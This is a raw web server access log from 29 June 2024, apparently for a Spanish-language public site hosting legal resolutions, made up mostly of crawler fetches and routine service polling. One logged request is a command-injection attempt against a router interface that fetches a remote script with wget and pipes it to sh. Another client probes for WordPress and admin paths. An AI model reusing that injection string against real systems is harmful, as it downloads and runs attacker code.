216.245.221.92 - - [29/Jun/2024:17:36:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:36:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:17:37:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2016.pdf HTTP/1.1" 200 492903
201.245.192.253 - - [29/Jun/2024:17:37:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35405
201.245.192.253 - - [29/Jun/2024:17:37:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
205.210.31.255 - - [29/Jun/2024:17:37:40 -0500] "\x16\x03\x01" 400 226
205.210.31.255 - - [29/Jun/2024:17:37:40 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [29/Jun/2024:17:37:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:37:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:17:38:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [29/Jun/2024:17:38:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1938.pdf HTTP/1.1" 200 640234
66.249.66.12 - - [29/Jun/2024:17:38:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1876.pdf HTTP/1.1" 200 361274
66.249.66.13 - - [29/Jun/2024:17:38:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3484.pdf HTTP/1.1" 200 432151
185.191.127.212 - - [29/Jun/2024:17:38:44 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
172.22.2.4 - - [29/Jun/2024:17:37:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:38:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:17:37:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46859
66.249.66.13 - - [29/Jun/2024:17:39:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1917.pdf HTTP/1.1" 200 370234
152.202.80.127 - - [29/Jun/2024:17:39:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/8+xmO6C8LY3SWCMiurrO5lVmI1hOgMM7tGYhEMNchYOss3Bp8sBFpmp9vemvoUsYMPVWmHEDZshqBQ98gYTSTg0hBE8eNcCBr6hil/uZwHFOupejLJDPhpaYNR60Ikf3wLPF5MFqtQ+MmqdvgCrk+75HDFRzJ5nOko9T06qnnAm2s0nlCRrJjMWXS1ZTaAuI2L3cclvwUqYGTSDJhxF+K0oLhNj/LF8ThdyJb0p7UEEyt99u9wAV/CGZhmvDBUf+F57Ps5SdD/A==&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
152.202.80.127 - - [29/Jun/2024:17:39:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Ja2Tol3Gkit/14IWzGAAHKxR9UAnKLHVBuHbXeRKvdBSxvoUExycQXuQcrqDsq/74im3aarDasSNgMWfRR4jf1HgVk+7jRRW3xmgjOzItHyeI/vcd3UHIDUE5FZhy/b7xHiD5EGwO642Jb7hujhGansWgw+BVjke1OX442RJc6pk2LKHQ3Ct/1Au0zTEn5qaTLa86nv7gaDz6+A4nNsqk+zIUbG7Qlx9aRLlvlqcDnoJeGQtOMuytvjup2MbhjvujZ5m61vj9gGfSMgVAcsnQ9r3uRlBYewSX7qPH2Wh6Ln2aCEBwzTOy6aQtpF35CV803MsMA+yk4Z9eoiTcZE/y2W/mjxmJ2piHL6rN5ILa5BRVcmDhhPRlUYTRPoJAwgXQ0y/MucsWAGKHr0d1BHdk4Qogpg1yZ1PBm4JJf4lvx/TLydAGyLZpWwV7bpFEN+pHK4/wOMokptRQIVZhbOY71LjkeShk1tquHgLhYyndEFGFeF+BXSWwlZGhoz7hjnAQ8SgTtpG608bTp43CrJbY6r1gspxjlpJcHoi/7VOlK0Dv1nPNF8mrCJ+q0k3+7KWjYEH1y800sYFEUKhqk1cB+mwtkaoYyJhdOz8kN/Sl+Xv9hGKy6bFNKwmSR2CwR0PCdZZ1lIcqoSR+i/5TPsJagzUFmbSYbQoZvw66Ne3fVDtdbFQEN1BlSg8Kdr3Ts6rQhEZbj3tHuQnFWPx5Ag2uIpTlaeTnUcuijZnBOW+tqT/NElIhjYmYHjwb7y759itu9XI12cGkRuZrgOUxwRiZfFf6J5YvZyWE6oUdSQoF7Ztfj16WiE0OWl0xDwqmn0HTyIFS9FhWiEBs0AUAFJFISAGOIhjgfUjbFDa82IDV3rZbag4uDaiJ1VJvRDTwK24VYQURqvnOIm3FBkmq7pZqxTJzXWrsAQA0rJqACT3F+CSdQoW3+vglF/1kyvo8QVHl9TJSdi00jCkf9osC5sIP6WP7jk7UD9nI42ITuGT3JXhsyDbigKueeyCif81g9fQjVkeaYmvFQ991tKNGOXHRCDQ/VYEB6Nl5qGa5mcBE6VVzO/uU1HrPiolO/ZuHtEYaGrABa/cttf+rIz0n2GureIXAt5CyEX07yb3VWSlUC4V2zC8qZ7TwalIoXgJiAA8NWBk/fMr4dhMhA4V3neGUgWxWLb13zpgT2AqSvwkq1u5KkU66uPOZcfwt8TWhqcqcVf28J1ZBl/sdBSjB/YE++Pnx4ruTTfgWgs7IDdvmw8iB9v4KIs6IQTM4uRrzgAfZhNfuPNnaznB01tZMCEiUTlAZ8SjQw9njZ8n6o4WmU4pcd0RFIQ1jOfLKvFUy0goZ8VsbWbgWJ1z+lZDaVOb16BSzjCLJoZ8OXySdRmvS647JopeBcmV0PfPToePx6XEEpM9TvcUDdP6VsvUCoabBn3gyPV/XTWW77lNFBSz2D8gpQ4no0plBrZzrCUvER6mahQ4tljOQQCGJdjTUqzNIJ0QvonatrgQ1ktDUYz960kgVZAHWIQI+JY5NSzEuXHeIbI2FmbNefca+pMRuO054we1RgdlMC/c=&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
152.202.80.127 - - [29/Jun/2024:17:39:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/FD1poYZEaT2J9eWAmQBUq6lCXT+M5JPTzTlJmxfgwOwUq3fGp7ZBXFsCBPyCCgQE992DwuUD49iX7uSTmknDJ3F7IoPOrFMrM5V1LBbsMdib1sHPz9/HfKFgAeMnCOrlneO0VfFPFqqpJFc5kxHzKcBqhvvc2Vzw=&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
152.202.80.127 - - [29/Jun/2024:17:39:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19tFYUgvUSlG5NTvMlDpj/yGvv93tr0UX30S9KCTdlpNkk7utRpAc0/XUU9eSDdirIhQqH83RjqVa0SQ9neL7ZSEqWu5bVngVRz8Yf6YomgsdJ17ggzXiotJ98emyJhnApBG72W3g+KvwoLH+r586/mfT4VzhZGHNY=&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
152.202.80.127 - - [29/Jun/2024:17:39:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+S3w9zkslm0VmioPt/eJHNSZgOY+yzh64pYz0j5CjKjqEX4HVkLzswATR3/xt79tJJR8ndKRm8TgNW8R3Of3uWNEgSAvbojjVHbsXw/Lp5ZYR/RfT4p7dn9pBPWJTExw0Cx8c4/4gF/VsgZE4PUmqmoHs3L/NeosE=&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
152.202.80.127 - - [29/Jun/2024:17:39:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Ndj75TdIXFsUiXYF3kvXzjsCeNynhZ1fkWpIG/lve/pgJSt5WXfo5k9AN9YiULkg8AKLM5Qv1gIrEFpaXQDmXVNYMFxYzQ8sjK/lNbas3KuIQIRNvHrX8HSLf8cQw3gnKXqh545CKKF3FSvoepmfve1krWAZul4frGGbl5RnP0yPrF8jmSDH37e0j4ZWE9zMc9JgMqlN1lA==&u=U2FsdGVkX1+tlUvcHxKASxEojBJxnSnN+mk1wkjMho4nueHV2Np4zwBD2PLEY3Jf&y=U2FsdGVkX1/Kwo5E/z/SOI14UhiNoo6BsxctrhsjFoN380w86As7cXslbBK2i1IO HTTP/1.1" 200 26
201.245.192.253 - - [29/Jun/2024:17:39:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35618
172.22.2.4 - - [29/Jun/2024:17:38:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
201.245.192.253 - - [29/Jun/2024:17:39:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:39:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
54.36.232.187 - - [29/Jun/2024:17:39:59 -0500] "GET /Publicaciones/2023EE19083.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:17:40:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35140
66.220.149.10 - - [29/Jun/2024:17:40:06 -0500] "GET /images/Senderos1.jpeg HTTP/1.1" 200 172777
66.249.66.11 - - [29/Jun/2024:17:40:12 -0500] "GET /BLA/resoluciones/AUTOS%202023/3511.pdf HTTP/1.1" 200 437232
66.249.66.13 - - [29/Jun/2024:17:40:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0010.pdf HTTP/1.1" 200 258342
201.245.192.253 - - [29/Jun/2024:17:40:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:17:41:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1242.pdf HTTP/1.1" 200 516374
216.245.221.92 - - [29/Jun/2024:17:41:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:41:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:41:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [29/Jun/2024:17:42:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0077.pdf HTTP/1.1" 200 451848
207.46.13.102 - - [29/Jun/2024:17:42:46 -0500] "GET /BLA/resoluciones/AUTOS%202023/1327.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:17:42:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:42:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:17:43:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000447.tif HTTP/1.1" 200 124700
66.249.66.11 - - [29/Jun/2024:17:43:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1121.pdf HTTP/1.1" 200 247796
172.22.2.4 - - [29/Jun/2024:17:42:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
172.22.2.4 - - [29/Jun/2024:17:43:49 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
181.58.62.22 - - [29/Jun/2024:17:43:50 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
201.245.192.253 - - [29/Jun/2024:17:43:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:43:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
181.58.62.22 - - [29/Jun/2024:17:44:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 333353
181.58.62.22 - - [29/Jun/2024:17:44:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/0028.pdf HTTP/1.1" 200 475373
181.58.62.22 - - [29/Jun/2024:17:44:11 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
181.58.62.22 - - [29/Jun/2024:17:44:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 333353
66.249.66.13 - - [29/Jun/2024:17:44:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0165.pdf HTTP/1.1" 200 277744
172.22.2.4 - - [29/Jun/2024:17:43:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
66.249.66.11 - - [29/Jun/2024:17:44:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0098.pdf HTTP/1.1" 200 294915
66.249.66.12 - - [29/Jun/2024:17:44:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2387.pdf HTTP/1.1" 200 354965
66.249.66.11 - - [29/Jun/2024:17:44:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/3329.pdf HTTP/1.1" 200 1085434
66.249.66.12 - - [29/Jun/2024:17:44:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0346.pdf HTTP/1.1" 200 335587
172.22.2.4 - - [29/Jun/2024:17:43:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:44:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:17:43:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
172.22.2.4 - - [29/Jun/2024:17:45:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [29/Jun/2024:17:45:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:45:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:17:46:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1703.pdf HTTP/1.1" 200 341312
66.249.66.11 - - [29/Jun/2024:17:46:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0610.pdf HTTP/1.1" 200 486360
216.245.221.92 - - [29/Jun/2024:17:46:49 -0500] "HEAD / HTTP/1.1" 200 -
185.208.158.35 - - [29/Jun/2024:17:46:56 -0500] "GET /wp-json/wp/v2/users HTTP/1.1" 404 1150
185.208.158.35 - - [29/Jun/2024:17:46:56 -0500] "GET /?author=1 HTTP/1.1" 200 319
201.245.192.253 - - [29/Jun/2024:17:46:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.208.158.35 - - [29/Jun/2024:17:46:58 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
185.208.158.35 - - [29/Jun/2024:17:46:59 -0500] "GET /wp-login.php HTTP/1.1" 404 1150
185.208.158.35 - - [29/Jun/2024:17:46:59 -0500] "GET /wp-login.php HTTP/1.1" 404 1150
172.22.2.4 - - [29/Jun/2024:17:47:10 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000002%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
185.208.158.35 - - [29/Jun/2024:17:47:15 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
185.208.158.35 - - [29/Jun/2024:17:47:16 -0500] "GET /admin HTTP/1.1" 404 1150
185.208.158.35 - - [29/Jun/2024:17:47:25 -0500] "GET /appsia/controlador/ HTTP/1.1" 404 68
40.77.167.13 - - [29/Jun/2024:17:47:25 -0500] "GET /Publicaciones/2023EE259146.pdf HTTP/1.1" 404 228
185.208.158.35 - - [29/Jun/2024:17:47:26 -0500] "GET /admin/ HTTP/1.1" 404 1150
185.208.158.35 - - [29/Jun/2024:17:47:37 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
185.208.158.35 - - [29/Jun/2024:17:47:37 -0500] "GET /admin HTTP/1.1" 404 1150
185.208.158.35 - - [29/Jun/2024:17:47:38 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
185.208.158.35 - - [29/Jun/2024:17:47:39 -0500] "GET /phpMyAdmin HTTP/1.1" 403 1168
185.208.158.35 - - [29/Jun/2024:17:47:40 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
66.249.66.12 - - [29/Jun/2024:17:47:40 -0500] "GET /Publicaciones/2024EE68220.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:17:47:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0521.pdf HTTP/1.1" 200 522256
185.208.158.35 - - [29/Jun/2024:17:47:56 -0500] "GET /appsia/controlador/ HTTP/1.1" 404 68
185.208.158.35 - - [29/Jun/2024:17:47:56 -0500] "GET /admin/ HTTP/1.1" 404 1150
201.245.192.253 - - [29/Jun/2024:17:47:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:47:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:17:47:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:17:48:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0784.pdf HTTP/1.1" 200 552229
66.249.66.11 - - [29/Jun/2024:17:48:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2009.pdf HTTP/1.1" 200 552512
66.249.66.13 - - [29/Jun/2024:17:48:45 -0500] "GET /BLA/resoluciones/AUTOS%202023/3790.pdf HTTP/1.1" 200 327377
201.245.192.253 - - [29/Jun/2024:17:48:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.49 - - [29/Jun/2024:17:49:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3918.pdf HTTP/1.1" 304 -
66.249.66.13 - - [29/Jun/2024:17:49:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1364.pdf HTTP/1.1" 200 821320
201.245.192.253 - - [29/Jun/2024:17:49:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:49:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.49 - - [29/Jun/2024:17:50:27 -0500] "GET /Publicaciones/2024EE123384.pdf HTTP/1.1" 404 228
18.205.176.41 - - [29/Jun/2024:17:50:27 -0500] "HEAD /BLA/resoluciones/AUTOS%202015/0774.pdf HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:17:48:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:17:50:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1556.pdf HTTP/1.1" 200 514461
201.245.192.253 - - [29/Jun/2024:17:50:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.55.39.49 - - [29/Jun/2024:17:51:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/3423.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:17:49:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.13 - - [29/Jun/2024:17:51:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2090.pdf HTTP/1.1" 200 522024
216.245.221.92 - - [29/Jun/2024:17:51:48 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:17:51:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:51:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:17:52:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3093.pdf HTTP/1.1" 200 292489
66.249.66.11 - - [29/Jun/2024:17:52:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000567.tif HTTP/1.1" 200 448986
201.245.192.253 - - [29/Jun/2024:17:52:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:17:52:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1268.pdf HTTP/1.1" 200 967162
201.245.192.253 - - [29/Jun/2024:17:52:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:17:53:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202016/&sort=name&order=desc HTTP/1.1" 200 172672
201.245.192.253 - - [29/Jun/2024:17:53:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:53:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:17:53:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/0069.pdf HTTP/1.1" 200 856877
66.249.66.13 - - [29/Jun/2024:17:54:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0065.pdf HTTP/1.1" 200 410294
66.249.66.11 - - [29/Jun/2024:17:54:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2186.pdf HTTP/1.1" 200 1120858
201.245.192.253 - - [29/Jun/2024:17:54:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:17:55:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1906.pdf HTTP/1.1" 200 557347
66.249.66.11 - - [29/Jun/2024:17:55:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2037.pdf HTTP/1.1" 200 367976
66.249.66.13 - - [29/Jun/2024:17:55:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1440.pdf HTTP/1.1" 200 675748
201.245.192.253 - - [29/Jun/2024:17:55:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:55:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.136 - - [29/Jun/2024:17:56:15 -0500] "GET /BLA/resoluciones/AUTOS%202020/0028.pdf HTTP/1.1" 200 475373
172.22.2.4 - - [29/Jun/2024:17:54:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:17:56:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2363.pdf HTTP/1.1" 200 435984
216.245.221.92 - - [29/Jun/2024:17:56:48 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.136 - - [29/Jun/2024:17:56:56 -0500] "GET /Publicaciones/2024EE119775.pdf HTTP/1.1" 404 228
201.245.192.253 - - [29/Jun/2024:17:56:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:17:57:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2435.pdf HTTP/1.1" 200 360421
172.22.2.4 - - [29/Jun/2024:17:55:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.11 - - [29/Jun/2024:17:57:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4778.PDF HTTP/1.1" 200 7788567
66.249.66.11 - - [29/Jun/2024:17:57:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1096.pdf HTTP/1.1" 200 504303
66.249.66.16 - - [29/Jun/2024:17:57:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0845.pdf HTTP/1.1" 200 513391
66.249.66.16 - - [29/Jun/2024:17:57:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0618.pdf HTTP/1.1" 200 522398
66.249.66.12 - - [29/Jun/2024:17:57:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0666.pdf HTTP/1.1" 200 970441
66.249.66.14 - - [29/Jun/2024:17:57:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0296.pdf HTTP/1.1" 200 546371
66.249.66.17 - - [29/Jun/2024:17:57:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0013.pdf HTTP/1.1" 200 491219
66.249.66.13 - - [29/Jun/2024:17:57:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0146.pdf HTTP/1.1" 200 1414563
201.245.192.253 - - [29/Jun/2024:17:57:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:17:57:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:17:57:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.15 - - [29/Jun/2024:17:57:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0065.pdf HTTP/1.1" 200 410294
66.249.66.16 - - [29/Jun/2024:17:58:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1017.pdf HTTP/1.1" 200 418753
66.249.66.14 - - [29/Jun/2024:17:58:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0638.pdf HTTP/1.1" 200 525299
66.249.66.19 - - [29/Jun/2024:17:58:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1223.pdf HTTP/1.1" 200 1302483
66.249.66.12 - - [29/Jun/2024:17:58:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1995.pdf HTTP/1.1" 200 360776
66.249.66.11 - - [29/Jun/2024:17:58:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1146.pdf HTTP/1.1" 200 380015
116.203.212.167 - - [29/Jun/2024:17:58:39 -0500] "GET /Publicaciones/2023EE15437.pdf HTTP/1.1" 404 227
66.249.66.13 - - [29/Jun/2024:17:58:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1711.pdf HTTP/1.1" 200 885130
66.249.66.15 - - [29/Jun/2024:17:58:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1245.pdf HTTP/1.1" 200 481329
66.249.66.12 - - [29/Jun/2024:17:58:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1510.pdf HTTP/1.1" 200 802374
66.249.66.14 - - [29/Jun/2024:17:58:54 -0500] "GET /resoluciones/RESOLUCIONES%202009/0466.pdf HTTP/1.1" 404 1018
